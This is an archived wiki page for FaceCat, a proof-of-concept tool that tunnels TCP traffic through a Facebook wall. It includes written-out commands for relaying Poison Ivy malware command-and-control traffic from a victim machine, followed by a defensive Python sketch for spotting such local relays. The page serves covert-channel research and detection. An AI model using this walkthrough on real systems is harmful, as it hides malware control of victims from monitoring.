This repository has been archived by the owner on Feb 10, 2023. It is now read-only.
Jose Selvi edited this page Aug 23, 2014 · 1 revision

FaceCat

FaceCat is a tool developed as a Proof of Concept regarding Covert Channels over Social Networks.

FaceCat is a FaceBook NetCat, and can be used to hide TCP traffic within a FaceBook Wall.

You can DOWNLOAD it or you can watch a couple of demos: TCP Chat, Poison Ivy.

WARNING! FaceCat is a PoC and it isn't updated on a regular basis, so if FaceBook changes it will be necessary to make some fixes in the code. If you update it for your own demos, please send a PULL REQUEST.

You can read more about FaceCat in my SANS GCIH Gold Paper.

$ ./facecat.py
Usage: facecat.py [options]

Options:
  -h, --help            show this help message and exit
  -w WALL, --wall=WALL  wall pipe account
  -c HOST, --host=HOST  connection host
  -p PORT, --port=PORT  listening or connection port
  -v, --verbose         verbose output

Usage Example:

1 - Create a Poison Ivy (or any other malware) sample. It should connect to 127.0.0.1:3460 as a C&C.

2 - Run a server mode facecat on the victim's machine. The FaceBook account used as a covert channel is [email protected]:

facecat.py -v -m [email protected] -p 3460

3 - Run the Poison Ivy C&C on the attacker's machine and then run a client mode facecat (it connects to the Poison Ivy C&C via TCP and to the server mode facecat via the covert channel):

facecat.py -v -m [email protected] -c 127.0.0.1 -p 3460

4 - Run the Poison Ivy sample on the victim's machine. It connects to the server mode facecat, which relays the communications through the FaceBook covert channel. The client mode facecat connects to the C&C and completes the relay channel.
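From the defender's side, the relay described in steps 1 to 4 leaves a recognizable socket pattern on the victim host: one process listens on a loopback port, a different process connects to it, and the listener also holds outbound web connections. The following detection sketch is an added example, not part of FaceCat or the original page; the row format, process names, PIDs and addresses are constructed assumptions.

```python
from collections import defaultdict

# Constructed socket inventory (not real telemetry). Row layout is an assumption:
# (pid, process, state, local_addr, local_port, remote_addr, remote_port)
SAMPLE = [
    (410, "python",     "LISTEN", "127.0.0.1", 3460,  None,           None),
    (410, "python",     "ESTAB",  "127.0.0.1", 3460,  "127.0.0.1",    50112),
    (977, "sample.exe", "ESTAB",  "127.0.0.1", 50112, "127.0.0.1",    3460),
    (410, "python",     "ESTAB",  "10.0.0.5",  50200, "203.0.113.10", 443),
    (120, "postgres",   "LISTEN", "127.0.0.1", 5432,  None,           None),
    (300, "app",        "ESTAB",  "127.0.0.1", 50300, "127.0.0.1",    5432),
    (650, "browser",    "ESTAB",  "10.0.0.5",  50400, "203.0.113.10", 443),
]

def is_loopback(addr):
    return addr is not None and (addr.startswith("127.") or addr == "::1")

def find_local_relays(rows, web_ports=(80, 443)):
    """Flag processes that accept loopback clients from another process
    while also holding outbound web connections (local relay pattern)."""
    listeners = {}                # loopback port -> pid of the listener
    names = {}                    # pid -> process name
    outbound = defaultdict(set)   # pid -> non-loopback web endpoints
    for pid, proc, state, laddr, lport, raddr, rport in rows:
        names[pid] = proc
        if state == "LISTEN" and is_loopback(laddr):
            listeners[lport] = pid
        elif state == "ESTAB" and not is_loopback(raddr) and rport in web_ports:
            outbound[pid].add((raddr, rport))
    findings = []
    for pid, proc, state, laddr, lport, raddr, rport in rows:
        if state != "ESTAB" or not is_loopback(raddr):
            continue
        owner = listeners.get(rport)
        # A different process is the client, and the listener talks to the web.
        if owner is not None and owner != pid and outbound[owner]:
            findings.append({"relay_pid": owner, "relay_proc": names[owner],
                             "client_pid": pid, "client_proc": proc,
                             "port": rport, "remote": sorted(outbound[owner])})
    return findings

if __name__ == "__main__":
    for finding in find_local_relays(SAMPLE):
        print(finding)
```

The heuristic only narrows candidates: local proxies and development tools show the same shape, so findings need triage against the remote endpoints and the parent process.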
